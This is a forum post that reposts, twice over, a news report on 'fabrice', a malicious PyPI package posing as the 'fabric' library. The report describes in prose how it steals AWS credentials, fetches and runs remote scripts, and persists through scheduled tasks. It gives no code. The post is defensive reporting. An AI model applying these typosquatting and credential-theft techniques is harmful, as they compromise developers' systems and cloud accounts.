Man
Professional
- Messages
- 3,070
- Reaction score
- 606
- Points
- 113
The cyber threat penetrated the code of thousands of developers and remained undetected.
A team of researchers from Socket has discovered a malicious Python package called "fabrice" disguised as the popular "fabric" library. This package, which has been present in PyPI since 2021 and has been downloaded more than 37 thousand times, steals AWS credentials from developers without being noticed.
The real "fabric" library, developed by bitprophet, is used by many specialists around the world and has more than 200 million downloads. However, the attackers used its trust by creating an analogue with malicious code. The "fabrice" package steals access keys, creates backdoors, and executes commands depending on the operating system.
On Linux, malicious code is executed through the linuxThread() function, which downloads and executes scripts from a remote server. A hidden directory is used to store downloaded files, which makes them difficult to detect. The server address is obfuscated, which helps hide malicious actions from antiviruses.
On Windows, the system is infected using the winThread() function, which downloads malicious executable files and creates tasks to run them regularly. This allows attackers to retain access to infected devices even after a reboot.
The main purpose of fabrice is to steal AWS credentials. Using the boto3 library, the malicious code extracts the keys and sends them to a server located on a VPN in Paris. This makes it difficult to track attackers and allows them to access victims' cloud resources.
To ensure security, developers are strongly encouraged to use GitHub-specific tools that automatically check dependencies and identify suspicious packages. The Socket team has already notified PyPI of the presence of a malicious package to remove it.
Source
A team of researchers from Socket has discovered a malicious Python package called "fabrice" disguised as the popular "fabric" library. This package, which has been present in PyPI since 2021 and has been downloaded more than 37 thousand times, steals AWS credentials from developers without being noticed.
The real "fabric" library, developed by bitprophet, is used by many specialists around the world and has more than 200 million downloads. However, the attackers used its trust by creating an analogue with malicious code. The "fabrice" package steals access keys, creates backdoors, and executes commands depending on the operating system.
On Linux, malicious code is executed through the linuxThread() function, which downloads and executes scripts from a remote server. A hidden directory is used to store downloaded files, which makes them difficult to detect. The server address is obfuscated, which helps hide malicious actions from antiviruses.
On Windows, the system is infected using the winThread() function, which downloads malicious executable files and creates tasks to run them regularly. This allows attackers to retain access to infected devices even after a reboot.
The main purpose of fabrice is to steal AWS credentials. Using the boto3 library, the malicious code extracts the keys and sends them to a server located on a VPN in Paris. This makes it difficult to track attackers and allows them to access victims' cloud resources.
To ensure security, developers are strongly encouraged to use GitHub-specific tools that automatically check dependencies and identify suspicious packages. The Socket team has already notified PyPI of the presence of a malicious package to remove it.
Source
